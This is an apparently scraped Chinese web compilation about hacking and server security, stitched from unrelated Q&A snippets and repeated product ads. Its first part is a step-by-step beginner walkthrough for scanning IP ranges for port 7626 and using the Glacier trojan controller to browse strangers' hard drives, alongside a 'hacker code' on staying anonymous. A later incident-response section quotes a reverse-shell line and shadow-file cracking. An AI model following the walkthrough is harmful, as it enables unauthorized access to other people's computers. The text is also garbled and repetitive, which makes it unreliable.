1、收集网统中的信息:
信息的收集并不对目标产生,只是为进一步侵提供有用信息。黑客可能会利开协议或工具,收集驻留在 *** 系统中的各个主机系统的相关信息。
2、探测目标 *** 系统的安全漏洞:
在收集到一些准备要攻击目标的信息后,黑客们会探测目标 *** 上的每台主机,来寻求系统内部的安全漏洞。
3、建立模拟环境,进行模拟攻击:
根据前面两小点所得的信息,建立一个类似攻击对象的模拟环境,然后对此模拟目标进行一系列的攻击。在此期间,通过检查被攻击方的日志,观察检测工具对攻击的反应,可以进一步了解在攻击过程中留下的“痕迹”及被攻击方的状态,以此来制定一个较为周密的攻击策略。
4、具体实施 *** 攻击:
入侵者根据前几步所获得的信息,同时结合自身的水平及经验总结出相应的攻击 *** ,在进行模拟攻击的实践后,将等待时机,以备实施真正的 *** 攻击
扩展资料:
黑客守则:
1、不恶意破坏任何的系统,这样只会给你带来麻烦。恶意破坏他人的软件将导致法律责任,如果你只是使用电脑,那仅为非法使用!注意:千万不要破坏别人的软件或资料!
2、不修改任何的系统档,如果你是为了要进入系统而修改它,请在达到目的后将它改回原状。
3、不要轻易的将你要hack的站台告诉你不信任的朋友。
4、不要在bbs上谈论你hack的任何事情。
5、在post文章的时候不要使用真名。
6、正在入侵的时候,不要随意离开你的电脑。
8、将你的笔记放在安全的地方。
9、想要成为黑客就要学好编程和数学,以及一些TCPIP协议、系统原理、编译原理等计算机知识!
10、已侵入电脑中的帐号不得清除或修改。
入人电脑
这道快餐是为从来没有通过进入过对算机的 *** 新手们的,主要使用的就是著名的国产冰河2.2,所以,如果你已经使用过冰河2.2,就不必跟着我们往下走了。其他有兴趣的 *** 新手们,Let's go
之一步木马软件 ***
下载必备的工具软件。1号软件就是端口扫描工具“ *** 刺客II”,2号软件就是著名的国产木马冰河2.2的控制端.
下载完毕并解压缩之后跟我进行第二步!
第二步
运行1号软件,首先出现的是“ *** 刺客II注册向导”,别理它,点击“稍后(Q)”就进入了 *** 刺客II的主界面。
第三步
在 *** 刺客II的主界面里选“工具箱(U)”-》“主机查找器(H)”,就进入了“搜索因特网主机”界面。
第四步
进入“搜索因特网主机”界面后,“起始地址”栏填XXX.XXX.0.0其中XXX.XXX自己去选择了,比如你可以选61.128或选61.200等等,“结束地址”栏填XXX.XXX.255.255其中XXX.XXX的选择要和前面一样。“端口”栏填7626,其他栏保持默认不动。
好了,以上设置就是要搜索从XXX.XXX.0.0到XXX.XXX.255.255这一段IP地址中有冰河木马的计算机了,再检查一下填对没有如果一切OK,请点击“开始搜索”。
第五步
观察“总进度”和“段进度”是否在走动。如果没有走动,那一定是IP地址设置不对,请认真检查。如果两个进度都在走动,呵呵,你就成功一半了,至少你会使用 *** 刺客II扫描网上开放某一端口的计算机了。 下面你要作的就是静静的等待,学用软件是需要耐心的。大约20-30分钟后,最下面的记录栏里就应该出现记录了(一般情况下,应该有5、6条记录)。每一条记录代表找到的中了冰河木马的一台计算机,前面是该计算机的IP地址,后面是7626(冰河木马端口)。黑客
第六步点击“停止搜索”,但不要退出程序,到第十二步时还要用。运行2号软件冰河,进入冰河主界面。选“[F]”-》“添加主机[A]”进入添加主机窗口。 文件
第七步 在“添加主机”窗口,“显示名称”里填入第五步里搜索到的之一条IP地址,当IP地址填入“显示名称”里后,“主机地址”里就自动填入相同的IP了。“访问口令”不填,“监听端口”保持默认的7626。
好了,检查一下IP有没有填错,如果OK,点击“确定”,在冰河主界面的“文件管理器”里就出现了刚才填入的IP地址了。
第八步
这一步和下一步最重要,请认真看清楚!在冰河的主界面里,点击“文件管理器”里的“我的电脑”,这时“文件管理器”右边的框里就会出现你的硬盘分区。比如,如果你的硬盘分的是四个区,“文件管理器”右边的框里就会从上往下依次出现C:、D:、E:、F:,如果你的硬盘分的是两个区,就会出现C:、D:。自己
第九步
点击“文件管理器”里刚才输入的之一条IP地址,稍等片刻(网速慢的情况下约10-30秒),在“文件管理器”右边的框里就会出现对方计算机的硬盘分区了。看到了吗看到了呵呵,祝贺你,你已经成功地进入对方的计算机了!
第十步 黑蚂蚁
你发现没有出现对方计算机的硬盘分区!呵呵,别急,看看冰河主界面最下端的状态栏里有什么提示,如果是下面两种情况,就放弃,返回第七步,填入搜索到的第二条IP地址: 黑蚂蚁
1、状态栏里出现“口令不对”、“口令错误”、“密码不对”、“密码错误”等之类的提示,表示该计算机的冰河木马是加了密码的,没有办法,只得放弃!
2、状态栏里出现“正在解释命令,可能是1.2以前版本”等之类的提示,也放弃,新手是搞不定的,如果以后你熟练了可以给对方升级,这是后话!
第十一步
如果出现的是“主机没有响应”、“无法与主机建立连接”之类的提示,
先别忙放弃,重复3-4遍第八步到第九步的操作,即点击“我的电脑”-》点击输入的IP地址,如此反复3-4遍后,还是不行的话再放弃,返回第七步,填入搜索到的下一条IP地址。
第十二步
如果所有搜索到的IP地址按照第七步至第十一步操作后都不能进入对方计算机,呵呵,那是你的运气太差!别急,这样的运气是经常碰到的!再返回第五步,在“搜索因特网主机”界面里点击“开始搜索”,这时该程序又从你停止的IP地址接着往下搜索了!呵呵,等吧!搜索吧!只要你有时间,你一定能成功!
第十三步 终于成功了!我见到对方计算机硬盘分区了!呵呵,怎么样你成功了,我的任务就完成了。进入对方计算机后,所有的操作和自己计算机“文件管理器”里的操作一模一样!就没什么黑不到过来的了 ``
黑客是入侵电脑的 *** 有9种。
1、获取口令
这又有三法:通过 *** 监听非法得到用户口令,这类 *** 有一定的局限性,但危害性极大,监听者往往能够获得其所在网段的所有用户账号和口令,对局域网安全威胁巨大;二是在知道用户的账号后(如电子邮件@前面的部分)利用一些专门软件强行破解用户口令,这种 *** 不受网段限制,但黑客要有足够的耐心和时间;三是在获得一个服务器上的用户口令文件(此文件成为Shadow文件)后,用暴力破解程序破解用户口令,该 *** 的使用前提是黑客获得口令的Shadow文件。此 *** 在所有 *** 中危害更大,因为它不需要像第二种 *** 那样一遍又一遍地尝试登录服务器,而是在本地将加密后的口令与Shadow文件中的口令相比较就能非常容易地破获用户密码,尤其对那些弱智用户(指口令安全系数极低的用户,如某用户账号为zys,其口令就是zys666、666666、或干脆就是zys等)更是在短短的一两分钟内,甚至几十秒内就可以将其干掉。
2、放置特洛伊木马程序
特洛伊木马程序可以直接侵入用户的电脑并进行破坏,它常被伪装成工具程序或者游戏等诱使用户打开带有特洛伊木马程序的邮件附件或从网上直接下载,一旦用户打开了这些邮件的附件或者执行了这些程序之后,它们就会象古特洛伊人在敌人城外留下的藏满士兵的木马一样留在自己的电脑中,并在自己的计算机系统中隐藏一个可以在Windows启动时悄悄执行的程序。当您连接到因特网上时,这个程序就会通知黑客,来报告您的IP地址以及预先设定的端口。黑客在收到这些信息后,再利用这个潜伏在其中的程序,就可以任意地修改您的计算机的参数设定、复制文件、窥视你整个硬盘中的内容等,从而达到控制你的计算机的目的。
3、WWW的欺骗技术
在网上用户可以利用IE等浏览器进行各种各样的WEB站点的访问,如阅读新闻组、咨询产品价格、订阅报纸、电子商务等。然而一般的用户恐怕不会想到有这些问题存在:正在访问的网页已经被黑客篡改过,网页上的信息是虚假的!例如黑客将用户要浏览的网页的URL改写为指向黑客自己的服务器,当用户浏览目标网页的时候,实际上是向黑 *** 务器发出请求,那么黑客就可以达到欺骗的目的了。
4、电子邮件攻击
电子邮件攻击主要表现为两种方式:一是电子邮件轰炸和电子邮件“滚雪球”,也就是通常所说的邮件炸弹,指的是用伪造的IP地址和电子邮件地址向同一信箱发送数以千计、万计甚至无穷多次的内容相同的垃圾邮件,致使受害人邮箱被“炸”,严重者可能会给电子邮件服务器操作系统带来危险,甚至瘫痪;二是电子邮件欺骗,攻击者佯称自己为系统管理员(邮件地址和系统管理员完全相同),给用户发送邮件要求用户修改口令(口令可能为指定字符串)或在貌似正常的附件中加载病毒或其他木马程序(据笔者所知,某些单位的 *** 管理员有定期给用户免费发送防火墙升级程序的义务,这为黑客成功地利用该 *** 提供了可乘之机),这类欺骗只要用户提高警惕,一般危害性不是太大。
5、通过一个节点来攻击其他节点
黑客在突破一台主机后,往往以此主机作为根据地,攻击其他主机(以隐蔽其入侵路径,避免留下蛛丝马迹)。他们可以使用 *** 监听 *** ,尝试攻破同一 *** 内的其他主机;也可以通过IP欺骗和主机信任关系,攻击其他主机。这类攻击很狡猾,但由于某些技术很难掌握,如IP欺骗,因此较少被黑客使用。
6、 *** 监听
*** 监听是主机的一种工作模式,在这种模式下,主机可以接受到本网段在同一条物理通道上传输的所有信息,而不管这些信息的发送方和接受方是谁。此时,如果两台主机进行通信的信息没有加密,只要使用某些 *** 监听工具,例如NetXray for windows 95/98/nt,sniffit for linux 、solaries等就可以轻而易举地截取包括口令和帐号在内的信息资料。虽然 *** 监听获得的用户帐号和口令具有一定的局限性,但监听者往往能够获得其所在网段的所有用户帐号及口令。
7、寻找系统漏洞
许多系统都有这样那样的安全漏洞(Bugs),其中某些是操作系统或应用软件本身具有的,如Sendmail漏洞,win98中的共享目录密码验证漏洞和IE5漏洞等,这些漏洞在补丁未被开发出来之前一般很难防御黑客的破坏,除非你将网线拔掉;还有一些漏洞是由于系统管理员配置错误引起的,如在 *** 文件系统中,将目录和文件以可写的方式调出,将未加Shadow的用户密码文件以明码方式存放在某一目录下,这都会给黑客带来可乘之机,应及时加以修正。
8、利用帐号进行攻击
有的黑客会利用操作系统提供的缺省账户和密码进行攻击,例如许多UNIX主机都有FTP和Guest等缺省账户(其密码和账户名同名),有的甚至没有口令。黑客用Unix操作系统提供的命令如Finger和Ruser等收集信息,不断提高自己的攻击能力。这类攻击只要系统管理员提高警惕,将系统提供的缺省账户关掉或提醒无口令用户增加口令一般都能克服。
9、偷取特权
利用各种特洛伊木马程序、后门程序和黑客自己编写的导致缓冲区溢出的程序进行攻击,前者可使黑客非法获得对用户机器的完全控制权,后者可使黑客获得超级用户的权限,从而拥有对整个 *** 的绝对控制权。这种攻击手段,一旦奏效,危害性极大。
1:利用系统漏洞或者BUG系统本身漏洞进行开放口强行进入.
2:利用木马或者病毒他人下载感染或者在线种植,打开某段端口进入计算机系统.
3:编写软件或者修改软件对自主编写的软件进行隐秘操作,诱导他人使用,然后进行远程更新安装文件对他人电脑进行扫描和汇报.
黑客一般用之一种和第三种 *** 第二种 *** 使用大多数叫 *** 流氓和黑客有本质区别
黑客现在一般都卖漏洞和肉鸡赚钱,在 *** 黑市漏洞和肉鸡赚的钱可以用百万形容.
利用第二种 *** 的一般都是偷东西的,例如网游帐号,虚拟装备.的小偷小摸行为,这种人 *** 界都叫" *** 流氓"
要么你中马,要么扫你电脑漏洞..一般民用的计算机想要入侵确实很简单.
入侵一个网站可以有很多种 *** ,在目前 *** 安全极差、攻击泛滥的情况下,做好服务器安全预防是很重要的措施,这里跟大家聊一聊黑客一般是怎么入侵服务器的。
阻止黑客入侵服务器的 ***
如果您对于服务器方面的技术并没有深入了解,可以直接使用安全狗的免费服务器安全软件,可以帮您检测入侵、拦截病毒、防御攻击,保证服务器的日常安全运作。
服务器安全狗,永久 *** :
多引擎,精准查杀网页木马、各类病毒
独有的安全狗云查杀引擎、网马引擎与专业的二进制病毒引擎结合,精确查杀各类网页木马和主流病毒。多引擎智能查杀病毒,全面保障服务器安全。
三层 *** 防护,实时保护 *** 安全
强有力的 *** 防护,实时监测IP和端口访问的合法性,实时拦截ARP攻击、Web攻击(抗CC)、DDOS攻击、暴力破解。
全面的文件/注册表保护,杜绝非法篡改
全面开放保护规则,同时支持监控网站目录,有效保护重要文件、目录与注册表不被篡改与删除,实时防止网站被上传网页木马。系统默认规则与用户自定义规则全支持,灵活定制,全面保护。
底层驱动防护,屏蔽入侵提权
驱动级保护,拦截更快速,有效防止未授权的非法用户登录服务器,实时阻止非法创建和修改系统帐号。
服务器安全加固,避免配置风险
全面的服务器体检,暴露安全隐患,当前系统健康情况了然于心,同时提供贴心的优化建议措施,加固服务器更简单,系统运行更快速,更安全。
黑客一般怎么入侵服务器的
黑客入侵别人的服务器方式大概有几个角度
1.如果是一台web服务器的话,可以从web漏洞;数据库以及中间件的漏洞入手
2.如果是一台个人pc电脑的话,可以从系统的漏洞入手,大部分以缓冲区溢出执行任意命令为主
3.还可以有其他角度,比如office宏病毒,编辑器插件漏洞入手,这都是比较常用的手段。
黑客怎样入侵服务器
(1) 寻找目标,获取信息。有明确的攻击目标。寻找有漏洞的机器,发现之后进行攻击。即一种是先有目标,另外一种是先有工具。一般来说,如“蠕虫事件”,更多地属于后一种。病毒和黑客的融合,使攻击自动化是目前比较流行的趋势。很多问题,过去的手工病毒,要繁殖生存,通过传播删除数据。黑客在发现“后门”后,利用这些病毒手段进行攻击。扫描是常用的寻找漏洞的手段。那么,哪些服务必须提供,哪些服务不需要提供,例如用户所不需要的某些功能服务作为选项在安装时会存在在系统中,这样就可能有漏洞存在在系统中。因此,如果接受的服务越多,就可能存在的问题越多。因此,不透明、经常变化、不定期升级、动态口令,使系统在变化中变得相对安全。目前,很多情况下,用户对自己的系统中的漏洞并不了解,某些先天不合理的缺陷存在在系统中,如果有人攻击这个弱点,就成为问题。所以,之一,要首先了解自己的系统。版本信息也是重要的,不同的版本,有不同的弱点,就可能成为攻击对象。系统的关键文件也是重要的,可以从中提取用户名和口令。
(2) 获取系统敏感文件的 *** 。匿名FTP、TFTP等。采用TFTP在很多蠕虫、强力攻击弱口令等手段中进行使用。
(3) 获取初始访问权限。如采用监听手段窃取口令。匿名FTP,利用主机间的缺省口令或信任关系(口令)等。利用发邮件,告诉你附件是个升级包,但有可能是一个病毒。利用技术防范上的漏洞。
(4) 获取超级用户口令。如SNIFER、缓冲区溢出等手段获取特权。目前的开发安全理论已经引起重视。软件工程与软件安全已经成为一个并行的方式。软件越庞大,漏洞越多。目前国内有人发现MICROSOFT有6个漏洞,据说这次发现之后直接就在网上公布了,但微软还没有找到相应的解决办法。所以给用户带来很大的风险。
(5) 消除痕迹。破坏系统后使用。
(6) 惯用手法。TFTP、拒绝服务(分布式拒绝服务)、SNIFFER嗅探器、缓冲区溢出、SYN同步风暴(发出大量的连接请求,但并不管连接结果,大量占用用户资源,出现死机。)目前有一种技术,使系统的资源只能用到60%等。采用路由器设置提高 *** 质量。但是对于公共系统,路由配置拒绝服务比较难。对于路由器的攻击,窃取权限修改路由表,或者造成资源DOWN机。因此,要经常检查路由器的状态。采取措施之前,应该先记录原始状态参数,不要轻易地重启技术。
通过上面的介绍,现在大家应该知道黑客一般是怎么入侵服务器的吧,如果是对于服务器攻防技术不熟悉的朋友,建议先安装一下安全狗的服务器安全软件,可以抵御日常的入侵和服务器安全防护,非常实用。
在 *** 服务器中,通常都会存有好多并不公开的机密文件,这些文件往往就是黑客入侵的主要目标,这里就跟大家聊聊服务器被黑客入侵了怎么办。
如果您对于服务器方面的技术并没有深入了解,可以直接使用安全狗的免费服务器安全软件,可以帮您检测入侵、拦截病毒、防御攻击,保证服务器的日常安全运作。
服务器安全狗,永久 *** :
多引擎,精准查杀网页木马、各类病毒
独有的安全狗云查杀引擎、网马引擎与专业的二进制病毒引擎结合,精确查杀各类网页木马和主流病毒。多引擎智能查杀病毒,全面保障服务器安全。
三层 *** 防护,实时保护 *** 安全
强有力的 *** 防护,实时监测IP和端口访问的合法性,实时拦截ARP攻击、Web攻击(抗CC)、DDOS攻击、暴力破解。
全面的文件/注册表保护,杜绝非法篡改
全面开放保护规则,同时支持监控网站目录,有效保护重要文件、目录与注册表不被篡改与删除,实时防止网站被上传网页木马。系统默认规则与用户自定义规则全支持,灵活定制,全面保护。
底层驱动防护,屏蔽入侵提权
驱动级保护,拦截更快速,有效防止未授权的非法用户登录服务器,实时阻止非法创建和修改系统帐号。
服务器安全加固,避免配置风险
全面的服务器体检,暴露安全隐患,当前系统健康情况了然于心,同时提供贴心的优化建议措施,加固服务器更简单,系统运行更快速,更安全。
1、检查系统日志,查看下是什么类型的攻击,看下攻击者都去了哪些地方。来内容是否又被修改的痕迹等,如果发现问题及时进行清理。
2、关闭不必要的服务和端口
3、定期整体扫描下服务器,看下存在什么问题, 有漏洞及时打补丁;检查是否有影子账户,不是自己建立的账号等。
4、重新设置账户密码,密码设置的复杂些;以及设置账户权限。
5、对服务器上的安全软件进行升级源,或者是对防护参数进行重新设置,使他符合当时的环境。如果没有安装,可以安装个服务器安全狗,同时,知还可以将服务器添加到安全狗服云平台上,这样当有攻击发生时,可以快速知道,并进行处理等。
6、检测网站,是否又被挂马、被篡改、挂黑链等,如果有,及时道清理。
7、如果是大流量攻击,可以看下DOSS流量清洗,这个很多安全厂商都有这个服务。
8、定期备份数据文件。如果之前有做备份,可以对重要数据进行替换。
服务器被黑客入侵了怎么办,如果您不是专业的服务器攻防人员的话,可以选择安装安全狗的免费服务器安全软件,可以保证服务器的日常运作和抵御入侵。
一般人遇到服务器被入侵,都会采用关闭所有服务的方式来应对,但是现在越来越多的服务器运行着重要的业务程序,就需要采取特殊的解决方式了,这里跟大家介绍一下服务器被入侵了怎么办。
如果您对于服务器方面的技术并没有深入了解,可以直接使用安全狗的免费服务器安全软件,可以帮您检测入侵、拦截病毒、防御攻击,保证服务器的日常安全运作。
服务器安全狗,永久 *** :
多引擎,精准查杀网页木马、各类病毒
独有的安全狗云查杀引擎、网马引擎与专业的二进制病毒引擎结合,精确查杀各类网页木马和主流病毒。多引擎智能查杀病毒,全面保障服务器安全。
三层 *** 防护,实时保护 *** 安全
强有力的 *** 防护,实时监测IP和端口访问的合法性,实时拦截ARP攻击、Web攻击(抗CC)、DDOS攻击、暴力破解。
全面的文件/注册表保护,杜绝非法篡改
全面开放保护规则,同时支持监控网站目录,有效保护重要文件、目录与注册表不被篡改与删除,实时防止网站被上传网页木马。系统默认规则与用户自定义规则全支持,灵活定制,全面保护。
底层驱动防护,屏蔽入侵提权
驱动级保护,拦截更快速,有效防止未授权的非法用户登录服务器,实时阻止非法创建和修改系统帐号。
服务器安全加固,避免配置风险
全面的服务器体检,暴露安全隐患,当前系统健康情况了然于心,同时提供贴心的优化建议措施,加固服务器更简单,系统运行更快速,更安全。
一、核实信息(运维/安全人员)
根据安全事件通知源的不同,分为两种:
1.外界通知:和报告人核实信息,确认服务器/系统是否被入侵。现在很多企业有自己的SRC(安全响应中心),在此之前更多的是依赖某云。这种情况入侵的核实一般是安全工程师完成。
2.自行发现:根据服务器的异常或故障判断,比如对外发送大规模流量或者系统负载异常高等,这种情况一般是运维工程师发现并核实的。
二、现场保护(运维)
我们很多人看过大陆的电视剧《重案六组》,每次接到刑事案件,刑警们之一时间就是封锁现场、保存现场原状。同样道理,安全事件发生现场,跟刑事案件发生现场一样,需要保存之一现场重要信息,方便后面入侵检测和取证。
1.保存现场环境(截图)
相关信息采集命令如下:
进程信息:ps axu
*** 信息:netstat –a
*** +进程:lsof / netstat -p
2.攻击者登陆情况(截图)
相关信息采集命令如下:
查看当前登录用户:w 或 who -a
三、服务器保护(运维/机房)
这里的现场保护和服务器保护是两个不同的环节,前者注重取证,后者注重环境隔离。
核实机器被入侵后,应当尽快将机器保护起来,避免被二次入侵或者当成跳板扩大攻击面。此时,为保护服务器和业务,避免服务器被攻击者继续利用,应尽快歉意业务,立即下线机器;
如果不能立即处理,应当通过配置 *** ACL等方式,封掉该服务器对 *** 的双向连接。
四、影响范围评估(运维/开发)
一般是运维或者程序确认影响范围,需要运维通过日志或者监控图表确认数据库或者敏感文件是否泄露,如果是代码或者数据库泄露了,则需要程序评估危害情况与处置 *** 。
影响访问评估一般从下面几点入手来:
具体业务架构:web(php/java, webserver), proxy, db等。
IP及所处区域拓扑等:VLAN内服务器和应用情况;
确定同一 *** 下面服务器之间的访问:可以互相登陆,是否需要key或者是密码登录。
由此确定检查影响范围,确认所有受到影响的网段和机器
五、在线分析(安全人员/运维)
这时需要根据个人经验快速在线分析,一般是安全人员和运维同时在线处理,不过会涉及多人协作的问题,需要避免多人操作机器时破坏服务器现场,造成分析困扰,之前笔者遇到一次类似,就是运维排查时敲错了iptables的命令,将iptables -L敲成iptables -i导致iptables-save时出现异常记录,结果安全人员上来检查时就被这条记录迷惑了,导致处理思路受到一定干扰。
1.所有用户History日志检测
关键字:wget/curl, gcc, 或者隐藏文件, 敏感文件后缀(.c,.py,conf, .pl, .sh)
检查是否存在异常用户
检查最近添加的用户,是否有不知名用户或不规范提权
找出root权限的用户
可以执行以下命令检查:
grep -v -E "^#" /etc/passwd | awk -F: '$3==0 { print $1}'
2.反连木马判断
netstat –a
注意非正常端口的外网IP;
3.可疑进程判断
判断是否为木马 ps –aux
重点关注文件(隐藏文件), python脚本,perl脚本,shell脚本(bash/sh/zsh);
使用which,whereis,find定位
4.Crontab检测
不要用crontab –l查看crontab(绕过检测),也有通过写crontab配置文件反弹shell的,笔者接触过几次,一般都是使用的bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
5.系统日志检测
检查sshd服务配置文件/etc/ssh/sshd_config和系统认证日志auth、message,判断是否为口令破解攻击
/etc/ssh/sshd_config文件确认认证方式;
确认日志是否被删除或者清理过的可能(大小判断);
last/lastb可以作为辅助,不过可能不准确;
6.NHIDS正常运行判断:
是否安装:ls /etc/ossec
是否运行正常:ps axu |grep nhids 三个nhids进程则表示正常
7.其他攻击分析:抓取 *** 数据包并进行分析
判断是否为拒绝服务攻击,这里需要注意,一定要使用-w参数,这样才能保存成pcap格式导入到wireshark,这样分析起来会事半功倍。
tcpdump -vvvn -w tcpdump.log
六、安全相关的关键文件和数据备份(运维)
可以同步进行,使用sftp/rsync等将日志上传到安全的服务器。
1.打包系统日志
参考:$ tar -jcvf syslog.tar.bz2 /var/log
2.打包web日志:access log
3.打包history日志(所有用户),参考:
$ cp /home/user/.history user_history
4.打包crontab记录
5.打包密码文件:/etc/passwd, /etc/shadow
6.打包可疑文件、后门、shell信息
七、深入分析(安全人员)
初步锁定异常进程和恶意代码后,将受影响范围梳理清楚,封禁了入侵者对机器的控制后,接下来需要深入排查入侵原因。一般可以从webshell、开放端口服务等方向顺藤摸瓜。
1.Webshell入侵
1)使用webshell_check.py脚本检测web目录;
$ python webshell_check.py /var/www/ >result.txt
2)查找web目录下所有nobody的文件,人工分析:
$ find /var/www –user nobody >nobody.txt
3)如果能确定入侵时间,可以使用find查找最近时间段内变化的文件;
$ find / -type f -name "\.*" |xargs ls -l |grep "Mar 22"
$ find / -ctime/-mtime 8
2.利用Web漏洞直接反连shell
分析access.log
1)缩小日志范围:时间,异常IP提取
2)攻击行为提取:常见的攻击exp识别
3.系统弱口令入侵
认证相关日志auth/syslog/message排查:
爆破行为定位和IP提取;
爆破是否成功确定:有爆破行为IP是否有accept记录。
如果日志已经被清理,使用工具(比如John the Ripper)爆破/etc/passwd,/etc/shadow。
4.其他入侵
其他服务器跳板到本机
5.后续行为分析
History日志:提权、增加后门,以及是否被清理。
Sniffer: 网卡混杂模式检测 ifconfig |grep –i proc
内网扫描: *** nmap/扫描器,socks5 ***
确定是否有rootkit:rkhunter, chkrootkit, ps/netstat替换确认
6.后门清理排查
根据时间点做关联分析:查找那个时间段的所有文件;
一些小技巧:/tmp目录, ls –la,查看所有文件,注意隐藏的文件;
根据用户做时间关联:比如nobody;
7.其他机器的关联操作
其他机器和这台机器的 *** 连接 (日志查看)、相同业务情况(同样业务,负载均衡)
八、整理事件报告(安全人员)
事件报告应包含但不限于以下几个点:
分析事件发生原因:事件为什么会发生的原因;
分析整个攻击流程:时间点、操作;
分析事件处理过程:整个事件处理过程总结是否有不足;
分析事件预防:如何避免事情再次发生;
总结:总结事件原因,改进处理过程,预防类似事件再次发生。
九、处理中的遇到的比较棘手的事情
1.日志和操作记录全被删了怎么办
strace 查看 losf 进程,再尝试恢复一下日志记录,不行的话镜像硬盘数据慢慢查。这个要用到一些取证工具了,dd硬盘数据再去还原出来。
2.系统账号密码都修改了,登不进去
重启进单用户模式修改root密码,或者通过控制卡操作,或者直接还原系统。都搞不定就直接重装吧。
3.使用常见的入侵检测命令未发现异常进程,但是机器在对外发包,这是怎么回事
这种情况下很可能常用的系统命令已经被攻击者或者木马程序替换,可以通过md5sum对比本机二进制文件与正常机器的md5值是否一致,如果发现不一致,肯定是被替换了,可以从其他机器上拷贝命令到本机替换,或者alias为其他名称,避免为恶意程序再次替换。
4.被getshell怎么办
1、漏洞修复前,系统立即下线,用内网环境访问。
2、上传点放到内网访问,不允许外网有类似的上传点,有上传点,而且没有校验文件类型很容易上传webshell。
3、被getshell的服务器中是否有敏感文件和数据库,如果有请检查是否有泄漏。
4、hosts文件中对应的host关系需要重新配置,攻击者可以配置hosts来访问测试环境。
5、重装系统
服务器被入侵了怎么办,可以参考上面的思路,根据步骤来一步步排查解决。服务器安全是非常重要的事项,一刻都不能马虎处理,如果您对于服务器安全攻防并不擅长,可以联系安全狗帮您解决。
目前服务器被入侵的现象越来越频繁,数据被窃取、篡改,网站被强制跳转等等都是被入侵的现象,作为服务器的管理员应该怎么预防服务器被入侵呢这里为大家稍微介绍一下。
如果您对于服务器方面的技术并没有深入了解,可以直接使用安全狗的免费服务器安全软件,可以帮您检测入侵、拦截病毒、防御攻击,保证服务器的日常安全运作。
服务器安全狗,永久 *** :
多引擎,精准查杀网页木马、各类病毒
独有的安全狗云查杀引擎、网马引擎与专业的二进制病毒引擎结合,精确查杀各类网页木马和主流病毒。多引擎智能查杀病毒,全面保障服务器安全。
三层 *** 防护,实时保护 *** 安全
强有力的 *** 防护,实时监测IP和端口访问的合法性,实时拦截ARP攻击、Web攻击(抗CC)、DDOS攻击、暴力破解。
全面的文件/注册表保护,杜绝非法篡改
全面开放保护规则,同时支持监控网站目录,有效保护重要文件、目录与注册表不被篡改与删除,实时防止网站被上传网页木马。系统默认规则与用户自定义规则全支持,灵活定制,全面保护。
底层驱动防护,屏蔽入侵提权
驱动级保护,拦截更快速,有效防止未授权的非法用户登录服务器,实时阻止非法创建和修改系统帐号。
服务器安全加固,避免配置风险
全面的服务器体检,暴露安全隐患,当前系统健康情况了然于心,同时提供贴心的优化建议措施,加固服务器更简单,系统运行更快速,更安全。
定期扫描检查
定期扫描 *** 主节点,及时查看扫描发现的安全漏洞,对漏洞进行彻底清理。定期维护也是必不可少的,这是对服务器的更好保护,所以定期扫描维护是必要的工作。
主动设置防火墙
防火墙说白了就是一个护盾,可以抵御攻击。在发现被攻击时会把攻击导向一些牺牲主机,最后保护了真正的主机不会受到攻击。
关闭端口
关闭所以不必要端口,对于登陆密码也可以进行修改,密码设置复杂一点。防止服务器密码泄露造成损失。ip地址限制,不是自己预先设置的IP不能进行登陆。这样可以说是锁上加锁更安全一些。
不断更新系统
首先,我们需要确保服务器软件没有漏洞来防止攻击者入侵。请确保服务器使用最新的系统并安装了安全补丁。删除服务器上未使用的服务并关闭未使用的端口。对于在服务器上运行的网站,请确保它们是最新修补的,并且没有安全漏洞。这是因为只有确保自己的安全,“敌人”才有机会利用它。
您可以选择使用CDN来解析所有域名和子域,这可能会隐藏服务器的真实IP,使服务器很难受到DDOS的攻击。
发送邮件时要小心
一般来说,当服务器向外界发送信息时,知识产权会被泄露,所以更好每个人都不要使用服务器发送大量邮件。如果必须发送邮件,可以通过第三方 *** 软件发送。以这种方式显示的知识产权是 *** 知识产权,不容易暴露服务器的真实知识产权。此外,目前80%以上的 *** 攻击都是从 *** 钓鱼邮件开始的。因此,除了不“公然”发送电子邮件之外,点击来历不明的电子邮件、文档和链接以避免造成麻烦也不容易。
选择高安全 *** 器
选择高安全 *** 器或将服务器托管在高安全性计算机房可以抑制一些DDOS攻击,从而减少服务器被杀死的情况。有了以上几点,服务器会更安全。
上面介绍了简单的怎么预防服务器被入侵的 *** ,如果您对于服务器安全的攻防并不了解,可以向安全狗咨询相关的技术事宜,我们会尽力给您解答。
黑客为了获取服务器上的重要数据,往往会不择手段,入侵服务器是最常见的方式,但是入侵服务器的方式非常多,也不是每个运维人员都懂得服务器安全攻防技术的,这里给大家介绍一款服务器防入侵工具。
服务器安全狗,永久 *** :
多引擎,精准查杀网页木马、各类病毒
独有的安全狗云查杀引擎、网马引擎与专业的二进制病毒引擎结合,精确查杀各类网页木马和主流病毒。多引擎智能查杀病毒,全面保障服务器安全。
三层 *** 防护,实时保护 *** 安全
强有力的 *** 防护,实时监测IP和端口访问的合法性,实时拦截ARP攻击、Web攻击(抗CC)、DDOS攻击、暴力破解。
全面的文件/注册表保护,杜绝非法篡改
全面开放保护规则,同时支持监控网站目录,有效保护重要文件、目录与注册表不被篡改与删除,实时防止网站被上传网页木马。系统默认规则与用户自定义规则全支持,灵活定制,全面保护。
底层驱动防护,屏蔽入侵提权
驱动级保护,拦截更快速,有效防止未授权的非法用户登录服务器,实时阻止非法创建和修改系统帐号。
服务器安全加固,避免配置风险
全面的服务器体检,暴露安全隐患,当前系统健康情况了然于心,同时提供贴心的优化建议措施,加固服务器更简单,系统运行更快速,更安全。
安全狗的服务器防入侵工具是目前市场上功能最强大的免费服务器安全软件,对于一般的服务器来说,安全狗足以帮助抵御日常的普通攻击和安全防御,能够确保服务器不会受到入侵威胁。
对于不懂服务器安全攻防的朋友,遇到服务器被入侵就非常头疼,入侵的方式又非常多,想要一一排查费时又费力,这里给大家介绍一款服务器防入侵软件,安装之后就可以不用担心服务器的日常防御问题了。
服务器安全狗,永久 *** :
多引擎,精准查杀网页木马、各类病毒
独有的安全狗云查杀引擎、网马引擎与专业的二进制病毒引擎结合,精确查杀各类网页木马和主流病毒。多引擎智能查杀病毒,全面保障服务器安全。
三层 *** 防护,实时保护 *** 安全
强有力的 *** 防护,实时监测IP和端口访问的合法性,实时拦截ARP攻击、Web攻击(抗CC)、DDOS攻击、暴力破解。
全面的文件/注册表保护,杜绝非法篡改
全面开放保护规则,同时支持监控网站目录,有效保护重要文件、目录与注册表不被篡改与删除,实时防止网站被上传网页木马。系统默认规则与用户自定义规则全支持,灵活定制,全面保护。
底层驱动防护,屏蔽入侵提权
